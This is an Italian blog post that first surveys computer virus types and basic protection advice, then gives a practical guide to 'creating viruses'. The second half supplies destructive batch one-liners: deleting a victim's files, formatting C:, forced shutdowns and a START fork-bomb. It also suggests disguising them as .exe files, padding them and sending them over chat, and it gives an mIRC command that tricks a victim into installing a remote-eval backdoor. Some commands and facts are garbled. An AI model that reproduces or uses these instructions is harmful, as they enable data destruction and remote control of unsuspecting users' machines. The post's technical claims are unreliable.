Un virus è una specie di software che, una volta eseguito, riesce a infettare altri file riproducendosi, cioè facendo copie di se stesso all’insaputa dell’utente. Esistono vari tipi di virus, più o meno dannosi per il Sistema Operativo, ed è composto da un numero molto ridotto di istruzioni per poter così eseguire solo poche operazioni, in mododa rendersi il più invisibile possibile. Un virus non è un programma eseguibile, dunque per essere attivato deve essere attivato su un programma “ospite”, infatti un virus quando è presente su un disco fisso, un CD, un floppy, non è infetto anche se viene copiato sul pc, fino a quando non viene attivato il programma che lo ospita, dunque quando viene caricato in memoria RAM, esso inizia ad agire.

Come detto esistono vari tipi di virus: i Macro Virus, che si diffondono sul pc della vittima infettando tutti i file delle applicazioni come quelli di Mircosoft Office, in particolare Word, Exel e Power Point; i Worms, che non possono essere definiti come dei veri e propri virus in quanto hanno la capacità di autodiffondersi, poichè non necessitano di legarsi al altri programmi. Il mezzo più comune utilizzato dai worms è la posta elettronica, infatti ricercano gli indirizzi email salvati sul pc, ed inviano una copia di sè stesso come allegato a tutti gli indirizzi che è riuscito a raccogliere; i Trojan Horses, meglio conosciuti come “cavallo di troia”, che sono forse i virus più diffusi e dannosi e sono costituiti da una applicazione di tipo client e un’altra di tipo server. I virus trojan più famosi sono BackOrifice e Netbus, attraverso i quali è possibile prendere il controllo di un’altro pc, permettendo dunque a colui che ha installato tale virus di trasferire file, controllare la rete, cercare le password salvate sul pc ecc; i virus Stealth (invisibili), che si nascondono nella RAM del computer, rimanendo inattivi per molto tempo, ma che quando si attivano possono creare danni irreversibili al pc se non si dispone di un antivirus di ultima generazione; i virus Retro, che tentano di sfuggire all’antivirus attaccandolo, infatti proprio per questo vengono definiti “virus-antivirus”; poi vi sono i cosiddetti “virus che non ci sono”, ossia dei finti virus, creati da lamer o da persone perditempo mediante email, per esempio su msn:”Attenzione, non aggiungere il contatto xxx@hotmail.it, è un virus che formatta il pc di chi lo aggiunge e di tutti i suoi contatti, invia questo messaggio a tutti i tuoi contatti affinchè non lo aggiungano” e simili, dunque facendo credere ad utente inesperto di essere a rischio virus, beffandolo. Comunque bisogna dire che giornalmente si lavora alla creazione di nuovi virus e dunque per essere sempre al sicuro da tali minacce consiglio di dotarsi di un buon antivirus da aggiornare costantemente, di un firewall, di non aprire allegati di posta elettronica contententi file sospetti e di non aprire o eseguire file di provenienza poco sicura.

Adesso passiamo alla parte pratica, cioè come si crea un virus. Vi ricordo che tale guida è solo a scopo informativo, e siccome lo scopo del sottoscritto e di tutto |omnia blog| è quello di diffondere la conoscenza e non quello di favorire i lamer a recare danni a terzi, spiegherò solo le basi senza andare nello specifico.

Creare un virus in formato base è semplice e bastano pochi procedimenti. Per creare un virus per cancellare un file presente nel pc della vittima bisogna Aprire il blocco notes e incollarci la seguente stringa @ERASE /S /Q “C:Percorso dove si trova il file da nominare” quindi se per esempio vogliamo eliminare il file crespo.txt che si trova sul desktop la stringa da applicare sarà @ERASE /S /Q “C:\Programmi\Documents and Settings\User\Desktop\crespo.txt” successivamente chiudete e salvate in formato .bat; Per creare un virus che formatta C aprire il blocco note e inserire la seguente stringa @format C: /autotest/booting/disactive C: /USE successivamente chiudete e salvate in .bat; Per creare un virus che Disconnette l’utente aprire il blocco note e inserire la stringa shutdown -l chiudere e salvare in .bat; per creare un virus che riavvia il pc inserire nel blocco note la stringa shutdwn -r chiudere e salvare in .bat; Per creare un virus che spegne il pc inserire nel blocco note la stringa shutdown -s chiudere e salvare in .bat; Per creare un virus che impalla il pc inserire nel blocco note la stringa START START START START uno sotto l’altro, più volte scrivete START più efficace sarà il virus;

Attraversi questi procedimenti andremo a creare dei virus in formato .bat, che chiunque abbia una minima conoscenza informatica non aprirebbe mai perchè li riconosce subito come virus, dunque vi consiglio il programma Batch To Exe 1.1, scaricabile cliccando qui, che permette di modificare i file da .bat a .exe. Inoltre siccome i virus hanno una dimensione molto ridotta che solitamente non va oltre i 10 k, per aumentare la dimensione del virus basterà aprire il blocco note, inserire il codice del virus e subito sotto aggiungere la stringa @REM aaaaaaa, attraverso questo comando non modificheremo il codice ma renderemo più pesante il file scrivendo per esempio dopo rem 1000 volta a.

I virus creati posso essere facilmente inviati via chat. Per finire, ecco un comando riguardante Irc da far digitare alla vittima per fargli scaricare un virsu backdoor //writer -c c ctcp ^*:z:?: .$eval($2-,2) dove c corrisponde al nome della backdoor e successivamente basterà fare un semplice CTCP alla vittima. Per disinstallare tale backdoor bisogna digitare il comando /unload -rs c dove c corrisponde sempre al nome della backdoor e successivamente andare nella cartella del proprio Mirc e cancellare la cartella “c”.